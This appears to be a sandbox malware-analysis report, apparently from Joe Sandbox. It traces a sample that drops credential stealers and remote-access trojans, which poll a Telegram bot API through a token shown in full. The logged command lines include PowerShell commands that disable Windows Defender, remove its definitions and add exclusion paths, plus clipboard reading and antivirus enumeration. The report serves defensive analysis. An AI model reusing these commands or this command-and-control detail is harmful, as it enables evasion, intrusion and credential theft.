2024-09-02 14:52:02 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:52:02 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:52:02 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.5	56280	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:52:03 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.5	56279	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:52:03 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
ZwResumeThread	INLINE	winlogon.exe, explorer.exe
NtDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
ZwDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
NtEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe
ZwEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
NtResumeThread	INLINE	winlogon.exe, explorer.exe
RtlGetNativeSystemInformation	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
NtEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe

Processes

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	10:49:53
Start date:	02/09/2024
Path:	C:\Users\user\Desktop\iqA8j9yGcd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\iqA8j9yGcd.exe"
Imagebase:	0x7ff72b8d0000
File size:	29'106'718 bytes
MD5 hash:	7EA99740A913FD01AB5B6D630A65F501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:49:54
Start date:	02/09/2024
Path:	C:\Users\user\Desktop\iqA8j9yGcd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\iqA8j9yGcd.exe"
Imagebase:	0x7ff72b8d0000
File size:	29'106'718 bytes
MD5 hash:	7EA99740A913FD01AB5B6D630A65F501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:49:55
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:49:55
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:49:55
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym
Imagebase:	0x420000
File size:	23'365'018 bytes
MD5 hash:	6123E1B1546C5468EDD1C8AA70F14A12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:49:56
Start date:	02/09/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff644790000
File size:	15'608'127 bytes
MD5 hash:	2F20A53D05D89D72A94192A6B8098B77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:49:57
Start date:	02/09/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff693690000
File size:	7'710'613 bytes
MD5 hash:	6FA985B82082F957E08C24749C36D88B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:49:58
Start date:	02/09/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff693690000
File size:	7'710'613 bytes
MD5 hash:	6FA985B82082F957E08C24749C36D88B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AmnesiaStealer, Description: Yara detected Amnesia Stealer, Source: 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AmnesiaStealer, Description: Yara detected Amnesia Stealer, Source: 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AmnesiaStealer, Description: Yara detected Amnesia Stealer, Source: 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:49:58
Start date:	02/09/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff644790000
File size:	15'608'127 bytes
MD5 hash:	2F20A53D05D89D72A94192A6B8098B77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:49:58
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:49:59
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:49:59
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym
Imagebase:	0xe80000
File size:	10'305'678 bytes
MD5 hash:	F651062559F616AC562C15B565CBC13F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 13%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:50:01
Start date:	02/09/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\svchost.exe"
Imagebase:	0x330000
File size:	4'042'529 bytes
MD5 hash:	45C59202DCE8ED255B4DBD8BA74C630F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000003.2086410223.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000003.2085959626.0000000005600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:50:01
Start date:	02/09/2024
Path:	C:\ProgramData\main.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\main.exe"
Imagebase:	0x25a8b0e0000
File size:	5'872'348 bytes
MD5 hash:	3D3C49DD5D13A242B436E0A065CD6837
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.2273857665.0000025A8D351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Imagebase:	0xe20000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\ProgramData\setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\setup.exe"
Imagebase:	0x7ff71bdc0000
File size:	5'617'152 bytes
MD5 hash:	1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:50:02
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:50:03
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:50:04
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:50:04
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:50:04
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:50:04
Start date:	02/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:50:04
Start date:	02/09/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6ff4d0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:50:04
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:50:05
Start date:	02/09/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6ff4d0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:50:05
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Imagebase:	0xc80000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2411600731.000000001358B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000021.00000000.2123320987.0000000000C82000.00000002.00000001.01000000.00000027.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
Antivirus matches:	Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:50:10
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:50:10
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:50:10
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff651590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:50:10
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
